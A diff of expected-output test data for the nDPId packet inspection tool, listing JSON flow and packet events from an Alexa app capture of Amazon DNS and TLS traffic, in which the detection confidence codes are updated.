{"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"dp-gw-na-js.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"176.32.101.52"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1497,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976093358,"flow_last_seen":1490976093358,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976093358,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1497,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1490976093358,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976093358,"pkt":"AMDKkaPvePiC0\/vCCABFAAA88bJAAEAGXMysECrYsCBlNKvhAbv82ZN1AAAAAKAC\/\/+6GAAAAgQFtAQCCAoA9mLHAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1501,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1490976093481,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976093481,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwL+xAAOcGd56wIGU0rBAq2AG7q+GBdUC1\/NmTdnASH\/53tgAAAgQFtAEDAwY="} 
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1503,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1490976093486,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976093486,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8bNAAEAGXN+sECrYsCBlNKvhAbv82ZN2gXVAtlAQAVfCJwAA"} -00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1504,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976093358,"flow_last_seen":1490976093491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976093491,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01451{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976093358,"flow_last_seen":1490976093953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3594,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1490976093953,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","server_names":"dp-gw-na.amazon.com,dp-gw-na-js.amazon.com,dp-gw-na.amazon.co.uk,dp-gw-na.amazon.de,dp-gw-na.amazon.co.jp,dp-gw-na.amazon.in","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=dp-gw-na.amazon.com","fingerprint":"27:E5:06:34:82:69:BC:97:5E:28:A3:C1:5A:23:81:C7:E3:28:95:8C"}} 
+00975{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1504,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976093358,"flow_last_seen":1490976093491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976093491,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01451{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976093358,"flow_last_seen":1490976093953,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3594,"flow_avg_l4_payload_len":449,"midstream":0,"thread_ts_msec":1490976093953,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dp-gw-na-js.amazon.com","server_names":"dp-gw-na.amazon.com,dp-gw-na-js.amazon.com,dp-gw-na.amazon.co.uk,dp-gw-na.amazon.de,dp-gw-na.amazon.co.jp,dp-gw-na.amazon.in","ja3":"731bcada65b0a6f850bada3bdcd716d1","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=dp-gw-na.amazon.com","fingerprint":"27:E5:06:34:82:69:BC:97:5E:28:A3:C1:5A:23:81:C7:E3:28:95:8C"}} 00191{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1524,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085,"global_ts_msec":1490976094729} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":1524,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976094725,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1586,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976088937,"flow_last_seen":1490976099286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":802,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976099286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1586,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1490976088937,"flow_last_seen":1490976099286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":802,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1490976099286,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45711,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100559,"flow_last_seen":1490976100559,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100559,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1598,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1490976100559,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976100559,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EgZAAEAGAiWsECrYNu8YuoUZAbtS0XeRAAAAAKAC\/\/9pqQAAAgQFtAQCCAoA9mWXAAAAAAEDAwg="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1600,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976100811,"flow_last_seen":1490976100811,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976100811,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -561,18 +561,18 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1607,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1490976100999,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976100999,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA0s4IAACcGiho250hYrBAq2AG7o2ETwX1YiAldXIAS\/\/\/2XwAAAgQFmAMDCAEEAgEB"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1608,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1490976100999,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976100999,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBwFAAEAGDT6sECrYNu8YuoUaAbt\/SWKyQ51EmVAQAVeW5AAA"} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1609,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":3,"flow_last_seen":1490976101000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976101000,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoOO9AAEAGq7msECrYNudIWKNhAbuICV1cE8F9WVAQAVc8uQAA"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1610,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100811,"flow_last_seen":1490976101001,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100859,"flow_last_seen":1490976101001,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976100811,"flow_last_seen":1490976101100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976101100,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976100859,"flow_last_seen":1490976101182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":339,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976101182,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01340{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100859,"flow_last_seen":1490976101183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2974,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1490976101183,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1610,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100811,"flow_last_seen":1490976101001,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
+00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1611,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976100859,"flow_last_seen":1490976101001,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976101001,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1614,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976100811,"flow_last_seen":1490976101100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976101100,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1621,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976100859,"flow_last_seen":1490976101182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":339,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976101182,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01340{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1623,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100859,"flow_last_seen":1490976101183,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1432,"flow_tot_l4_payload_len":2974,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1490976101183,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.231.72.88","src_port":41825,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"s3-external-2.amazonaws.com","server_names":"s3-external-1.amazonaws.com,*.s3-external-1.amazonaws.com,s3-external-2.amazonaws.com,*.s3-external-2.amazonaws.com,*.s3.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"ea615e28cb25adfb2f261151eab3314f","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com Inc., CN=*.s3-external-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"C0:51:D8:FA:6B:58:94:F2:3E:4E:7D:B2:36:5F:02:E4:F0:3F:54:FF"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1490976101550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976101550,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8EgdAAEAGAiSsECrYNu8YuoUZAbtS0XeRAAAAAKAC\/\/9pRQAAAgQFtAQCCAoA9mX7AAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1642,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":3,"flow_last_seen":1490976101623,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976101623,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwX5pAAOcGDZw27xi6rBAq2AG7hRl1e+g1UtF3knASH\/6OkAAAAgQFtAEDAwY="} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107217,"flow_last_seen":1490976107217,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1490976107217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1490976107217,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1490976107217,"pkt":"AMDKkaPvePiC0\/vCCABFAABFWlxAAEARM1KsECrYrBAqATiMADUAMXUjXSIBAAABAAAAAAAADHNraWxscy1zdG9yZQZhbWF6b24DY29tAAABAAE="} -00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1659,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976107217,"flow_last_seen":1490976107217,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1490976107217,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"skills-store.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
